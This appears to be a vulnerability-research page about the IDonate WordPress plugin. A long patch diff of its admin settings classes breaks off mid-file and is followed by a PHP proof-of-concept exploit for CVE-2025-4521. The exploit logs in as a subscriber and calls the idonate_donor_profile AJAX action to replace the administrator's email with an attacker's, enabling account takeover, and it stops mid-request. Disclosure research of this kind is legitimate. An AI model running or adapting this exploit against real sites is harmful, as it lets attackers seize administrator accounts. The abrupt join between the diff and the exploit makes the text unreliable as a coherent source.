-		);
-	}
-}
--- a/idonate/src/Admin/Settings/IDonateGeneralSettings.php
+++ b/idonate/src/Admin/Settings/IDonateGeneralSettings.php
@@ -1,252 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-use ThemeAtelierIdonateHelpersCountriesCountries;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateGeneralSettings
-{
-
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-
-		$countryOption = Countries::idonate_all_countries();
-
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('GENERAL', 'idonate'),
-				'icon'	=> 'icofont-gear',
-				'fields' => array(
-					array(
-						'id'       => 'idonate_container',
-						'type'     => 'column',
-						'title'    => esc_html__('Container Width', 'idonate'),
-						'desc' => esc_html__('Set plugin pages container maximum width in different devices.', 'idonate'),
-						'default'  => array(
-							'large_desktop'    	=> '1120',
-							'desktop'          	=> '1140',
-							'laptop'          	=> '960',
-							'tablet'           	=> '720',
-							'mobile'           	=> '540',
-						),
-					),
-					array(
-						'id'       => 'idonate_section_padding',
-						'type'     => 'column',
-						'class' => 'pro_only_field',
-						'title'    => esc_html__('Section Padding', 'idonate'),
-						'desc' => esc_html__('Set plugin pages section padding in different devices.', 'idonate'),
-						'default'  => array(
-							'large_desktop'    	=> '80',
-							'desktop'          	=> '80',
-							'laptop'          	=> '60',
-							'tablet'           	=> '50',
-							'mobile'           	=> '40',
-						),
-					),
-					array(
-						'id'        => 'idonate_color_settings',
-						'type'      => 'color_group',
-						'title'     => esc_html__('Color Settings', 'idonate'),
-						'class'		=> 'pro_only_field',
-						'desc'		=> esc_html__('Basic color palette for elements', 'idonate'),
-						'options'   => array(
-							'donor_maincolor' => esc_html__('Main Color', 'idonate'),
-							'donor_bordercolor' => esc_html__('Main Border Color', 'idonate'),
-						)
-					),
-
-					array(
-						'id'       	=> 'idonate_recaptcha_active',
-						'type'     	=> 'switcher',
-						'title'    	=> esc_html__('Activate reCAPTCHA for Forms', 'idonate'),
-						'desc'		=> __('When enabled, reCAPTCHA will be activated on all forms to enhance security and prevent spam submissions.', 'idonate'),
-						'text_on'	=> esc_html__('Enable', 'idonate'),
-						'text_off'	=> esc_html__('Disable', 'idonate'),
-						'text_width'	=> '100',
-					),
-					array(
-						'id' 			=>	'idonate_recapthca_label',
-						'type' 			=>	'text',
-						'title'			=> esc_html__('reCAPTCHA Label', 'idonate'),
-						'desc'			=> esc_html__('Label to display before the reCAPTCHA checkbox.', 'idonate'),
-						'default'		=> esc_html__('Please verify that you are human:', 'idonate'),
-						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true'),
-					),
-					array(
-						'id'       		=> 'idonate_recaptcha_secretkey',
-						'type'     		=> 'text',
-						'title'    		=> esc_html__('reCAPTCHA Secret Key', 'idonate'),
-						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
-						'subtitle'			=> esc_html__('Set your generated recaptcha secret key.', 'idonate'),
-						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true')
-					),
-					array(
-						'id'       => 'idonate_recaptcha_sitekey',
-						'type'     => 'text',
-						'title'    => esc_html__('Recaptcha Site Key', 'idonate'),
-						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
-						'subtitle'		=> esc_html__('Set your generated recaptcha site key.', 'idonate'),
-						'dependency' => array('idonate_recaptcha_active', '==', 'true')
-					),
-					array(
-						'id'       => 'enable_single_country',
-						'type'     => 'switcher',
-						'title'    => esc_html__('Single Country Mode', 'idonate'),
-						'desc'	=> esc_html__('When enabled, the forms will display only the selected country in the country field', 'idonate'),
-						'text_on'	=> esc_html__('Enable', 'idonate'),
-						'text_off'	=> esc_html__('Disable', 'idonate'),
-						'text_width'	=> '100',
-					),
-					array(
-						'id'       => 'idonate_country',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Select Country', 'idonate'),
-						'options' => $countryOption,
-						'dependency' => array('enable_single_country', '==', 'true')
-					),
-
-					array(
-						'id'     => 'donor_social_share',
-						'type'   => 'fieldset',
-						'title'  => esc_html__('Social Share', 'idonate'),
-						'fields' => array(
-							array(
-								'id'       => 'social_sharing_media',
-								'type'     => 'select',
-								'title'    => esc_html__('Sharing Media', 'idonate'),
-								'chosen'   => true,
-								'sortable' => true,
-								'multiple' => true,
-								'placeholder' => esc_html__('Choose an option', 'idonate'),
-								'options'  => array(
-									'facebook' => esc_html__('Facebook', 'idonate'),
-									'twitter' => esc_html__('Twitter', 'idonate'),
-									'linkedIn' => esc_html__('LinkedIn', 'idonate'),
-									'pinterest' => esc_html__('Pinterest', 'idonate'),
-									'email' => esc_html__('Email', 'idonate'),
-									'instagram' => esc_html__('Instagram', 'idonate'),
-									'vk'   => esc_html__('VK', 'idonate'),
-									'digg' => esc_html__('digg', 'idonate'),
-									'tumblr' => esc_html__('Tumblr', 'idonate'),
-									'reddit' => esc_html__('Reddit', 'idonate'),
-									'whatsapp' => esc_html__('WhatsApp', 'idonate'),
-									'xing' => esc_html__('Xing', 'idonate'),
-								),
-							),
-							array(
-								'id'       => 'social_margin',
-								'type'     => 'spacing',
-								'title'    => esc_html__('Margin', 'idonate'),
-								'sanitize' => 'idonate_sanitize_number_array_field',
-								'min'      => -100,
-								'units'    => array('px'),
-								'default'  => array(
-									'top'  => '0',
-									'right' => '0',
-									'bottom' => '0',
-									'left' => '0',
-								),
-							),
-							array(
-								'id'      => 'social_icon_shape',
-								'class'   => 'social_icon_shape',
-								'type'    => 'layout_preset',
-								'title'   => esc_html__('Icon Shape', 'idonate'),
-								'options' => array(
-									'idonate_circle'    => array(
-										'image'       => IDONATE_ASSETS . 'images/circle-icon.png',
-										'text' => esc_html__('Circle', 'idonate'),
-									),
-									'idonate_rounded'   => array(
-										'image'       => IDONATE_ASSETS . 'images/round-icon.png',
-										'text' => esc_html__('Rounded', 'idonate'),
-									),
-									'idonate_square'    => array(
-										'image'       => IDONATE_ASSETS . 'images/square-icon.png',
-										'text' => esc_html__('Square', 'idonate'),
-									),
-									'icon_only' => array(
-										'image'       => IDONATE_ASSETS . 'images/only-icon.png',
-										'text' => esc_html__('Icon only', 'idonate'),
-									),
-								),
-								'default' => 'idonate_circle',
-							),
-							array(
-								'id'      => 'social_icon_custom_color',
-								'type'    => 'checkbox',
-								'title'   => esc_html__('Custom Color', 'idonate'),
-								'default' => false,
-							),
-							array(
-								'id'      => 'social_icon_color',
-								'type'    => 'color_group',
-								'title'   => esc_html__('Icon Color', 'idonate'),
-								'options' => array(
-									'icon_color'       => esc_html__('Icon', 'idonate'),
-									'icon_hover_color' => esc_html__('Icon Hover', 'idonate'),
-									'icon_bg'       => esc_html__('Background', 'idonate'),
-									'icon_bg_hover' => esc_html__('Background Hover', 'idonate'),
-									'icon_border_hover' => esc_html__('Border Hover', 'idonate'),
-								),
-								'default' => array(
-									'icon_color'       => '#ffffff',
-									'icon_hover_color' => '#ffffff',
-									'icon_bg'       => '#ef1414',
-									'icon_bg_hover' => '#ef1414',
-									'icon_border_hover' => '#ef1414',
-								),
-								'dependency' => array('social_icon_custom_color', '==', 'true'),
-							),
-							array(
-								'id'      => 'social_icon_border',
-								'type'    => 'border',
-								'title'   => esc_html__('Icon Border', 'idonate'),
-								'default' => array(
-									'all' => '1',
-									'style' => 'solid',
-									'color' => '#af111c',
-								),
-								'all'     => true,
-								'dependency' => array('social_icon_custom_color', '==', 'true'),
-							),
-						),
-					),
-
-				),
-			)
-		);
-	}
-}
--- a/idonate/src/Admin/Settings/IDonatePageSettings.php
+++ b/idonate/src/Admin/Settings/IDonatePageSettings.php
@@ -1,145 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonatePageSettings
-{
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('PAGE SETTINGS', 'idonate'),
-				'icon' => 'icofont-file-alt',
-				'fields' => array(
-					array(
-						'id'       	=> 'dashboard_page',
-						'type'     	=> 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    	=> esc_html__('Dashboard Page', 'idonate'),
-						'options' 	=> 'pages',
-						'desc'    	=> esc_html__('Select your dashboard page', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       	=> 'rp_request_page',
-						'type'     	=> 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    	=> esc_html__('Blood Request Listing Page', 'idonate'),
-						'options' 	=> 'pages',
-						'desc'    	=> esc_html__('Select your page to display blood requests. Default page name: Request', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'rf_form_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Blood Request Form Page', 'idonate'),
-						'options' => 'pages',
-						'desc'		=> esc_html('Select your page to display blood request form. Default page name: Blood request', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'donor_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Donor Listing Page', 'idonate'),
-						'options'    => 'pages',
-						'desc'    => esc_html__('Select your page to display donors. Default page name: Donors', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'donor_table_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Donor Table Page', 'idonate'),
-						'options'    => 'pages',
-						'desc'    => esc_html__('Select your page to display donor table. Default page name: Donor Table', 'idonate'),
-						'placeholder' => 'Select an option',
-					),
-					array(
-						'id'       => 'donor_register_page',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('Donor Register Page', 'idonate'),
-						'options'    => 'pages',
-						'desc'    => esc_html__('Select your page to display donor registraion form. Default page name: Donor Register', 'idonate'),
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-					array(
-						'id'       => 'login_redirect',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('After Login Redirect Page', 'idonate'),
-						'desc'    => esc_html__('Select your page to redirect after successful login. Default page name: Home page', 'idonate'),
-						'options'    => 'pages',
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-						'query_args'  => array(
-							'posts_per_page' => -1
-						),
-					),
-					array(
-						'id'       => 'logout_redirectpage',
-						'type'     => 'select',
-						'chosen'      => true,
-						'settings'	=> array(
-							'width'		=> '227px',
-						),
-						'title'    => esc_html__('After Logout Redirect Page', 'idonate'),
-						'desc'    => esc_html__('Select your page to redirect after successful logout. Default page name: Login page', 'idonate'),
-						'options'    => 'pages',
-						'placeholder' => esc_html__('Select a page', 'idonate'),
-					),
-				),
-			)
-		);
-	}
-}
--- a/idonate/src/Admin/Settings/IDonateRequestSettings.php
+++ b/idonate/src/Admin/Settings/IDonateRequestSettings.php
@@ -1,197 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateRequestSettings
-{
-
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('REQUEST SETTINGS', 'idonate'),
-				'icon'	=> 'icofont-blood',
-				'fields' => array(
-					array(
-						'type' => 'tabbed',
-						'tabs' => array(
-							array(
-								'title'  => __('Blood Request Listings Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'donor_request_status',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Require Admin Approval for Blood Requests', 'idonate'),
-										'desc'		=> esc_html__('When enabled, all blood request posts will require your approval before being published to ensure accuracy and appropriateness.', 'idonate'),
-										'text_on'	=> esc_html__('Enable', 'idonate'),
-										'text_off'	=> esc_html__('Disable', 'idonate'),
-										'text_width'	=> '100'
-									),
-									array(
-										'id'       => 'post_request_number_of_columns',
-										'type'     => 'column',
-										'class' => 'pro_only_field',
-										'title'    => esc_html__('Column(s)', 'idonate'),
-										'desc' => esc_html__('Set number of column(s) in different devices for responsive view.', 'idonate'),
-										'default'  => array(
-											'large_desktop'    => '3',
-											'desktop'          => '3',
-											'tablet'           => '2',
-											'mobile'           => '1',
-										),
-										'min'      => '1',
-										'help'       => __('<i class="icofont-monitor"></i> <b> Large Desktop </b> - is larger than 1200px,<br><i class="icofont-laptop"></i> <b>Desktop</b> - size is larger than 992px,<br> <i class="icofont-surface-tablet"></i> <b>Tablet</b> - Size is larger than 768,<br> <i class="icofont-android-tablet"></i> <b> Mobile Landscape </b> - size is larger than 576px.,<br> <i class="icofont-android-tablet"></i> <b> Mobile </b> - size is smaller than 576px.', 'idonate'),
-									),
-
-									array(
-										'id'       	=> 'rp_request_per_page',
-										'type'     	=> 'number',
-										'title'    	=> esc_html__('Blood Request Per Page', 'idonate'),
-										'desc'	=> esc_html__('Set the number of blood requests displayed per page in the blood requests listings.', 'idonate'),
-										'default' 	=> 9,
-									),
-
-									array(
-										'id'       => 'request_view_button',
-										'type'     => 'button_set',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Open Request View Details', 'idonate'),
-										'desc'	=> esc_html__('Choose how the request details should displayed on', 'idonate'),
-										'options' => array(
-											'single_page_link' => esc_html__('On Single Page', 'idonate'),
-											'popup' => esc_html__('On Pop Up', 'idonate'),
-										),
-										'default'	=> 'single_page_link',
-									),
-									array(
-										'id'       	=> 'blood_request_view_slug',
-										'type'     	=> 'text',
-										'title'    	=> esc_html__('Request Single Page Slug', 'idonate'),
-										'default'	=> 'blood-request',
-										'dependency' => array('request_view_button', '==', 'single_page_link'),
-									),
-									array(
-										'id'       => 'request_next_prev',
-										'type'     => 'checkbox',
-										'title'    => esc_html__('Enable Next/Prev', 'idonate'),
-										'desc'	=> esc_html__('Allow navigation between requests using next and previous buttons in the popup view.', 'idonate'),
-										'dependency' => array('request_view_button', '==', 'popup')
-									),
-									array(
-										'id'       => 'auto_delete_expired_requests',
-										'type'     => 'select',
-										'title'    => esc_html__('Auto-Delete Expired Blood Requests', 'idonate'),
-										'desc'	=> esc_html__('Automatically remove blood requests that are no longer needed. ', 'idonate'),
-										'options' => array(
-											'never_delete' => esc_html__('Never Delete', 'idonate'),
-											'current_date' => esc_html__('Delete on Blood Needed Date', 'idonate'),
-											'one_week' => esc_html__('Delete One Week After Blood Needed Date', 'idonate'),
-											'two_week' => esc_html__('Delete Two Weeks After Blood Needed Date (Pro)', 'idonate'),
-											'one_month' => esc_html__('Delete One Month After Blood Needed Date (Pro)', 'idonate'),
-										),
-										'default' => 'one_week',
-									),
-								),
-							),
-							array(
-								'title'  => __('Text Settings (Pro)', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'rf_form_title',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Blood Request Form Title', 'idonate'),
-										'desc'		=> esc_html__('The title displayed on the request form.', 'idonate'),
-										'default'	=> esc_html__('Submit Your Request', 'idonate'),
-									),
-									array(
-										'id'       => 'rf_sub_title',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Blood Request Form Sub Title', 'idonate'),
-										'desc'		=> esc_html__('The subtitle displayed on the request form.', 'idonate'),
-										'default'	=> esc_html__('Please fill the following information to post your blood request.', 'idonate'),
-									),
-									array(
-										'id'       => 'rf_btn_label',
-										'type'     => 'text',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Submit Button Label for Request Form', 'idonate'),
-										'desc'	=> esc_html__('The label text displayed on the submit button of the request form.', 'idonate'),
-										'default'	=> esc_html__('Blood Request', 'idonate'),
-									),
-								),
-							),
-							array(
-								'title'  => __('Form Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'idonate_bloodrequestcountryhide',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Country and State Fields On the Request Form', 'idonate'),
-										'desc'	=> esc_html__('Toggle the visibility of country and state fields', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-									array(
-										'id'       => 'rf_form_img_upload',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Image Upload Field On the Request Form', 'idonate'),
-										'desc'	=> esc_html__('Toggle the visibility of image upload field', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> false,
-									),
-									array(
-										'id'       => 'request_form_color',
-										'type'     => 'color_group',
-										'class'      => 'pro_only_field',
-										'title'    => esc_html__('Request Form Color', 'idonate'),
-										'desc'	=> esc_html__('Set request form text and background color.', 'idonate'),
-										'options'   => array(
-											'background' => esc_html__('Background Color', 'idonate'),
-											'color' => esc_html__('Text Color', 'idonate'),
-										),
-									),
-								),
-							),
-						),
-					),
-				),
-			)
-		);
-	}
-}
--- a/idonate/src/Admin/Settings/IDonateSettings.php
+++ b/idonate/src/Admin/Settings/IDonateSettings.php
@@ -0,0 +1,827 @@
+<?php
+
+/**
+ * Custom CSS settings tab.
+ *
+ * @since      1.0.0
+ *
+ * @package idonate
+ * @subpackage idonate/Admin/Settings
+ * @author     ThemeAtelier<themeatelierbd@gmail.com>
+ */
+
+namespace ThemeAtelierIdonateAdminSettings;
+
+use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
+use ThemeAtelierIdonateHelpersCountriesCountries;
+// Cannot access directly.
+if (!defined('ABSPATH')) {
+	die;
+}
+
+/**
+ * This class is responsible for Custom CSS settings tab in settings page.
+ *
+ * @since      1.0.0
+ */
+class IDonateSettings
+{
+
+	/**
+	 * Custom CSS settings.
+	 *
+	 * @since 1.0.0
+	 * @param string $prefix idonate_organizers_settings.
+	 */
+	public static function section($prefix)
+	{
+
+		$countryOption = Countries::idonate_all_countries();
+
+		IDONATE::createSection(
+			$prefix,
+			array(
+				'title'  => esc_html__('GENERAL', 'idonate'),
+				'icon'	=> 'icofont-gear',
+				'fields' => array(
+					array(
+						'id'       => 'idonate_container',
+						'type'     => 'column',
+						'title'    => esc_html__('Container Width', 'idonate'),
+						'desc' => esc_html__('Set plugin pages container maximum width in different devices.', 'idonate'),
+						'default'  => array(
+							'large_desktop'    	=> '1120',
+							'desktop'          	=> '1140',
+							'laptop'          	=> '960',
+							'tablet'           	=> '720',
+							'mobile'           	=> '540',
+						),
+					),
+					array(
+						'id'       => 'idonate_section_padding',
+						'type'     => 'column',
+						'class' => 'pro_only_field',
+						'title'    => esc_html__('Section Padding', 'idonate'),
+						'desc' => esc_html__('Set plugin pages section padding in different devices.', 'idonate'),
+						'default'  => array(
+							'large_desktop'    	=> '80',
+							'desktop'          	=> '80',
+							'laptop'          	=> '60',
+							'tablet'           	=> '50',
+							'mobile'           	=> '40',
+						),
+					),
+					array(
+						'id'        => 'idonate_color_settings',
+						'type'      => 'color_group',
+						'title'     => esc_html__('Color Settings', 'idonat-pro'),
+						'class'		=> 'pro_only_field',
+						'desc'		=> esc_html__('Basic color palette for elements', 'idoante-pro'),
+						'options'   => array(
+							'donor_maincolor' => esc_html__('Main Color', 'idonate'),
+							'donor_bordercolor' => esc_html__('Main Border Color', 'idonate'),
+						)
+					),
+
+					array(
+						'id'       	=> 'idonate_recaptcha_active',
+						'type'     	=> 'switcher',
+						'title'    	=> esc_html__('Activate reCAPTCHA for Forms', 'idonate'),
+						'desc'		=> __('When enabled, reCAPTCHA will be activated on all forms to enhance security and prevent spam submissions.', 'idonate'),
+						'text_on'	=> esc_html__('Enable', 'idonate'),
+						'text_off'	=> esc_html__('Disable', 'idonate'),
+						'text_width'	=> '100',
+					),
+					array(
+						'id' 			=>	'idonate_recapthca_label',
+						'type' 			=>	'text',
+						'title'			=> esc_html__('reCAPTCHA Label', 'idoante-pro'),
+						'desc'			=> esc_html__('Label to display before the reCAPTCHA checkbox.', 'idoante-pro'),
+						'default'		=> esc_html__('Please verify that you are human:', 'idoante-pro'),
+						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true'),
+					),
+					array(
+						'id'       		=> 'idonate_recaptcha_secretkey',
+						'type'     		=> 'text',
+						'title'    		=> esc_html__('reCAPTCHA Secret Key', 'idonate'),
+						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
+						'subtitle'			=> esc_html__('Set your generated recaptcha secret key.', 'idonate'),
+						'dependency' 	=> array('idonate_recaptcha_active', '==', 'true')
+					),
+					array(
+						'id'       => 'idonate_recaptcha_sitekey',
+						'type'     => 'text',
+						'title'    => esc_html__('Recaptcha Site Key', 'idonate'),
+						'desc'	=> __('Create google recaptcha <a href="https://www.google.com/recaptcha/admin#list">sitekey and secretkey</a>', 'idonate'),
+						'subtitle'		=> esc_html__('Set your generated recaptcha site key.', 'idonate'),
+						'dependency' => array('idonate_recaptcha_active', '==', 'true')
+					),
+					array(
+						'id'       => 'enable_single_country',
+						'type'     => 'switcher',
+						'title'    => esc_html__('Single Country Mode', 'idonate'),
+						'desc'	=> esc_html__('When enabled, the forms will display only the selected country in the country field', 'idonate'),
+						'text_on'	=> esc_html__('Enable', 'idonate'),
+						'text_off'	=> esc_html__('Disable', 'idonate'),
+						'text_width'	=> '100',
+					),
+					array(
+						'id'       => 'idonate_country',
+						'type'     => 'select',
+						'chosen'      => true,
+						'settings'	=> array(
+							'width'		=> '227px',
+						),
+						'title'    => esc_html__('Select Country', 'idonate'),
+						'options' => $countryOption,
+						'dependency' => array('enable_single_country', '==', 'true')
+					),
+
+					array(
+						'id'     => 'donor_social_share',
+						'type'   => 'fieldset',
+						'title'  => esc_html__('Social Share', 'idonate'),
+						'fields' => array(
+							array(
+								'id'       => 'social_sharing_media',
+								'type'     => 'select',
+								'title'    => esc_html__('Sharing Media', 'idonate'),
+								'chosen'   => true,
+								'sortable' => true,
+								'multiple' => true,
+								'placeholder' => esc_html__('Choose an option', 'idonate'),
+								'options'  => array(
+									'facebook' => esc_html__('Facebook', 'idonate'),
+									'twitter' => esc_html__('Twitter', 'idonate'),
+									'linkedIn' => esc_html__('LinkedIn', 'idonate'),
+									'pinterest' => esc_html__('Pinterest', 'idonate'),
+									'email' => esc_html__('Email', 'idonate'),
+									'instagram' => esc_html__('Instagram', 'idonate'),
+									'vk'   => esc_html__('VK', 'idonate'),
+									'digg' => esc_html__('digg', 'idonate'),
+									'tumblr' => esc_html__('Tumblr', 'idonate'),
+									'reddit' => esc_html__('Reddit', 'idonate'),
+									'whatsapp' => esc_html__('WhatsApp', 'idonate'),
+									'xing' => esc_html__('Xing', 'idonate'),
+								),
+							),
+							array(
+								'id'       => 'social_margin',
+								'type'     => 'spacing',
+								'title'    => esc_html__('Margin', 'idonate'),
+								'sanitize' => 'idonate_sanitize_number_array_field',
+								'min'      => -100,
+								'units'    => array('px'),
+								'default'  => array(
+									'top'  => '0',
+									'right' => '0',
+									'bottom' => '0',
+									'left' => '0',
+								),
+							),
+							array(
+								'id'      => 'social_icon_shape',
+								'class'   => 'social_icon_shape',
+								'type'    => 'layout_preset',
+								'title'   => esc_html__('Icon Shape', 'idonate'),
+								'options' => array(
+									'idonate_circle'    => array(
+										'image'       => IDONATE_ASSETS . 'images/circle-icon.png',
+										'text' => esc_html__('Circle', 'idonate'),
+									),
+									'idonate_rounded'   => array(
+										'image'       => IDONATE_ASSETS . 'images/round-icon.png',
+										'text' => esc_html__('Rounded', 'idonate'),
+									),
+									'idonate_square'    => array(
+										'image'       => IDONATE_ASSETS . 'images/square-icon.png',
+										'text' => esc_html__('Square', 'idonate'),
+									),
+									'icon_only' => array(
+										'image'       => IDONATE_ASSETS . 'images/only-icon.png',
+										'text' => esc_html__('Icon only', 'idonate'),
+									),
+								),
+								'default' => 'idonate_circle',
+							),
+							array(
+								'id'      => 'social_icon_custom_color',
+								'type'    => 'checkbox',
+								'title'   => esc_html__('Custom Color', 'idonate'),
+								'default' => false,
+							),
+							array(
+								'id'      => 'social_icon_color',
+								'type'    => 'color_group',
+								'title'   => esc_html__('Icon Color', 'idonate'),
+								'options' => array(
+									'icon_color'       => esc_html__('Icon', 'idonate'),
+									'icon_hover_color' => esc_html__('Icon Hover', 'idonate'),
+

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-4521 - IDonate 2.1.5 - 2.1.9 - Missing Authorization to Authenticated (Subscriber+) Account Takeover/Privilege Escalation via idonate_donor_profile Function

<?php

$target_url = "https://vulnerable-site.com"; // Change to target WordPress site
$username = "attacker"; // Subscriber-level username
$password = "password"; // Subscriber-level password
$admin_donor_id = 1; // Target administrator donor ID
$attacker_email = "attacker@example.com"; // Email attacker controls

// Step 1: Authenticate to WordPress
$login_url = $target_url . "/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to retrieve nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"/', $response, $log_match);
preg_match('/name="pwd"[^>]+value="([^"]*)"/', $response, $pwd_match);

// Perform login
$post_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Step 2: Exploit missing authorization in idonate_donor_profile function
$ajax_url = $target_url . "/wp-admin/admin-ajax.php";
$exploit_data = array(
    'action' => 'idonate_donor_profile',
    'donor_id' => $admin_donor_id, // Target administrator's donor ID
    'email' => $attacker_email, // Replace admin email with attacker's email
    'first_name' => 'Admin', // Maintain original first name
    'last_name' => 'User', // Maintain original last name
    'phone' => '1234567890', // Example phone number
    'blood_group' => 'A+', // Example blood group
    'country' => 'US', // Example country
    'state' => 'California', // Example state
    'city' => 'Los Angeles', // Example city
    'address' => '123 Main St', // Example address
    'zip_code' => '90001', // Example zip code
    'gender' => 'male', // Example gender
    'date_of_birth' => '1990-01-01', // Example date of birth
    'last_donation_date' => '2024-01-01' // Example last donation date
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
